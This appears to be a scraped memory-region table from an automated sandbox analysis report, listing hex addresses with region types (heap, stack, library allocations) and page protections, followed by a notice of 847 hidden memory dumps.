|
286E5DB5000
|
trusted library allocation
|
page read and write
|
||
|
1F97B95C000
|
heap
|
page read and write
|
||
|
21F65BFD000
|
heap
|
page read and write
|
||
|
21F66678000
|
heap
|
page read and write
|
||
|
286E3EC8000
|
heap
|
page read and write
|
||
|
1F97B96A000
|
heap
|
page read and write
|
||
|
21F65C14000
|
heap
|
page read and write
|
||
|
1F97B8B9000
|
heap
|
page read and write
|
||
|
1F97D7C3000
|
heap
|
page read and write
|
||
|
21F65FEC000
|
heap
|
page read and write
|
||
|
26D8B6B4000
|
heap
|
page read and write
|
||
|
286E3F1D000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
286E3EBE000
|
heap
|
page read and write
|
||
|
21F63DDA000
|
heap
|
page read and write
|
||
|
21F66090000
|
heap
|
page read and write
|
||
|
286E5CAA000
|
trusted library allocation
|
page read and write
|
||
|
245A1ECC000
|
trusted library allocation
|
page read and write
|
||
|
26D8B690000
|
heap
|
page read and write
|
||
|
21F66027000
|
heap
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
21F6678F000
|
heap
|
page read and write
|
||
|
15D24C2A000
|
heap
|
page read and write
|
||
|
26D8B762000
|
heap
|
page read and write
|
||
|
245A0A00000
|
heap
|
page readonly
|
||
|
26D8B790000
|
heap
|
page read and write
|
||
|
26D89830000
|
heap
|
page read and write
|
||
|
286FE040000
|
heap
|
page read and write
|
||
|
286E5D78000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BE2000
|
trusted library allocation
|
page read and write
|
||
|
26D89830000
|
heap
|
page read and write
|
||
|
21F63E90000
|
heap
|
page read and write
|
||
|
1F97B8AB000
|
heap
|
page read and write
|
||
|
21F65BFC000
|
heap
|
page read and write
|
||
|
AF3BAFE000
|
stack
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
21F6696C000
|
heap
|
page read and write
|
||
|
5701C7E000
|
stack
|
page read and write
|
||
|
245A09F0000
|
trusted library allocation
|
page read and write
|
||
|
21F66024000
|
heap
|
page read and write
|
||
|
21F65FAC000
|
heap
|
page read and write
|
||
|
1F97D71C000
|
heap
|
page read and write
|
||
|
26D8B691000
|
heap
|
page read and write
|
||
|
245A4B0C000
|
trusted library allocation
|
page read and write
|
||
|
21F63EA5000
|
heap
|
page read and write
|
||
|
21F63EB0000
|
heap
|
page read and write
|
||
|
1F97D6A4000
|
heap
|
page read and write
|
||
|
286FE06B000
|
heap
|
page read and write
|
||
|
26D8B69C000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
8868E93000
|
stack
|
page read and write
|
||
|
15D36B23000
|
trusted library allocation
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
15D24D47000
|
heap
|
page execute and read and write
|
||
|
1F97D760000
|
heap
|
page read and write
|
||
|
21F669A7000
|
heap
|
page read and write
|
||
|
1F97D6AC000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
15D3EB67000
|
heap
|
page read and write
|
||
|
1F97D674000
|
heap
|
page read and write
|
||
|
7FF848C96000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
26D8B696000
|
heap
|
page read and write
|
||
|
21F66031000
|
heap
|
page read and write
|
||
|
26D89829000
|
heap
|
page read and write
|
||
|
21F6602E000
|
heap
|
page read and write
|
||
|
26D8B76F000
|
heap
|
page read and write
|
||
|
21F63DD9000
|
heap
|
page read and write
|
||
|
15D36AC0000
|
trusted library allocation
|
page read and write
|
||
|
21F65EE0000
|
heap
|
page read and write
|
||
|
286FDE1C000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
1F97B95F000
|
heap
|
page read and write
|
||
|
2459F040000
|
heap
|
page read and write
|
||
|
21F66997000
|
heap
|
page read and write
|
||
|
286E3FAA000
|
heap
|
page read and write
|
||
|
21F65BF0000
|
heap
|
page read and write
|
||
|
1F97B88C000
|
heap
|
page read and write
|
||
|
21F63EA5000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
21F666DE000
|
heap
|
page read and write
|
||
|
21F63E46000
|
heap
|
page read and write
|
||
|
72947E000
|
stack
|
page read and write
|
||
|
1F97D6B0000
|
heap
|
page read and write
|
||
|
21F667D1000
|
heap
|
page read and write
|
||
|
15D26E9B000
|
trusted library allocation
|
page read and write
|
||
|
26D8B6A4000
|
heap
|
page read and write
|
||
|
26D898E3000
|
heap
|
page read and write
|
||
|
AF3B4F9000
|
stack
|
page read and write
|
||
|
1F97B96A000
|
heap
|
page read and write
|
||
|
21F6691F000
|
heap
|
page read and write
|
||
|
1F97B931000
|
heap
|
page read and write
|
||
|
26D8982A000
|
heap
|
page read and write
|
||
|
AF3B6FE000
|
stack
|
page read and write
|
||
|
5701D7F000
|
stack
|
page read and write
|
||
|
72987C000
|
stack
|
page read and write
|
||
|
286FDE77000
|
heap
|
page execute and read and write
|
||
|
3A3B5FB000
|
stack
|
page read and write
|
||
|
286E3EB4000
|
heap
|
page read and write
|
||
|
1F97D85D000
|
heap
|
page read and write
|
||
|
26D8981B000
|
heap
|
page read and write
|
||
|
286E5D61000
|
trusted library allocation
|
page read and write
|
||
|
21F669B4000
|
heap
|
page read and write
|
||
|
886927E000
|
stack
|
page read and write
|
||
|
26D898D0000
|
heap
|
page read and write
|
||
|
1F97D684000
|
heap
|
page read and write
|
||
|
1F97D66C000
|
heap
|
page read and write
|
||
|
286FDE21000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
21F669E2000
|
heap
|
page read and write
|
||
|
1F97D729000
|
heap
|
page read and write
|
||
|
26D898E3000
|
heap
|
page read and write
|
||
|
21F65C26000
|
heap
|
page read and write
|
||
|
26D897AE000
|
heap
|
page read and write
|
||
|
1F97B880000
|
heap
|
page read and write
|
||
|
21F66032000
|
heap
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D3EBA1000
|
heap
|
page read and write
|
||
|
21F65BFF000
|
heap
|
page read and write
|
||
|
286E5D7B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
1F97D74B000
|
heap
|
page read and write
|
||
|
AF3B9FF000
|
stack
|
page read and write
|
||
|
21F6664C000
|
heap
|
page read and write
|
||
|
15D3EB6A000
|
heap
|
page read and write
|
||
|
21F65C63000
|
heap
|
page read and write
|
||
|
21F65FB0000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
21F63E90000
|
heap
|
page read and write
|
||
|
15D24B90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
|
21F65C33000
|
heap
|
page read and write
|
||
|
26D898DF000
|
heap
|
page read and write
|
||
|
1F97D682000
|
heap
|
page read and write
|
||
|
21F65D80000
|
remote allocation
|
page read and write
|
||
|
245A14C8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
C52FEFE000
|
stack
|
page read and write
|
||
|
245A0A80000
|
trusted library allocation
|
page read and write
|
||
|
21F65850000
|
heap
|
page read and write
|
||
|
1F97B740000
|
heap
|
page read and write
|
||
|
26D8B88E000
|
heap
|
page read and write
|
||
|
286E5DF8000
|
trusted library allocation
|
page read and write
|
||
|
26D8B706000
|
heap
|
page read and write
|
||
|
1F97D6C0000
|
heap
|
page read and write
|
||
|
26D8B6B7000
|
heap
|
page read and write
|
||
|
26D897B0000
|
heap
|
page read and write
|
||
|
5701EF8000
|
stack
|
page read and write
|
||
|
26D8B891000
|
heap
|
page read and write
|
||
|
15D24DD0000
|
heap
|
page read and write
|
||
|
21F63E8E000
|
heap
|
page read and write
|
||
|
15D24DD5000
|
heap
|
page read and write
|
||
|
26D8B88E000
|
heap
|
page read and write
|
||
|
26D8B694000
|
heap
|
page read and write
|
||
|
72937E000
|
stack
|
page read and write
|
||
|
245A1294000
|
trusted library allocation
|
page read and write
|
||
|
245B10E3000
|
trusted library allocation
|
page read and write
|
||
|
15D26DB2000
|
trusted library allocation
|
page read and write
|
||
|
21F65FEC000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
26D8B6E0000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26D898DB000
|
heap
|
page read and write
|
||
|
26D898CB000
|
heap
|
page read and write
|
||
|
21F63DDA000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
26D897AA000
|
heap
|
page read and write
|
||
|
21F665E0000
|
heap
|
page read and write
|
||
|
21F65FA2000
|
heap
|
page read and write
|
||
|
21F665E2000
|
heap
|
page read and write
|
||
|
21F63E8E000
|
heap
|
page read and write
|
||
|
1F97B888000
|
heap
|
page read and write
|
||
|
1F97B8B8000
|
heap
|
page read and write
|
||
|
C52FAFE000
|
stack
|
page read and write
|
||
|
21F65C1E000
|
heap
|
page read and write
|
||
|
15D26B1C000
|
trusted library allocation
|
page read and write
|
||
|
26D8B697000
|
heap
|
page read and write
|
||
|
21F669CE000
|
heap
|
page read and write
|
||
|
21F65DD0000
|
heap
|
page read and write
|
||
|
286E57D0000
|
trusted library allocation
|
page read and write
|
||
|
21F65C47000
|
heap
|
page read and write
|
||
|
26D89808000
|
heap
|
page read and write
|
||
|
245A756E000
|
trusted library allocation
|
page read and write
|
||
|
21F66088000
|
heap
|
page read and write
|
||
|
2459F135000
|
heap
|
page read and write
|
||
|
21F65C4D000
|
heap
|
page read and write
|
||
|
286E5790000
|
trusted library allocation
|
page read and write
|
||
|
245A1071000
|
trusted library allocation
|
page read and write
|
||
|
2459F085000
|
heap
|
page read and write
|
||
|
21F65BFA000
|
heap
|
page read and write
|
||
|
15D26BC5000
|
trusted library allocation
|
page read and write
|
||
|
26D8B776000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
886937F000
|
stack
|
page read and write
|
||
|
26D8B77B000
|
heap
|
page read and write
|
||
|
21F666DA000
|
heap
|
page read and write
|
||
|
26D8B69F000
|
heap
|
page read and write
|
||
|
1F97D704000
|
heap
|
page read and write
|
||
|
245A0B66000
|
heap
|
page read and write
|
||
|
1F97D85E000
|
heap
|
page read and write
|
||
|
15D2704A000
|
trusted library allocation
|
page read and write
|
||
|
21F65FBC000
|
heap
|
page read and write
|
There are 847 hidden memdumps, click here to show them.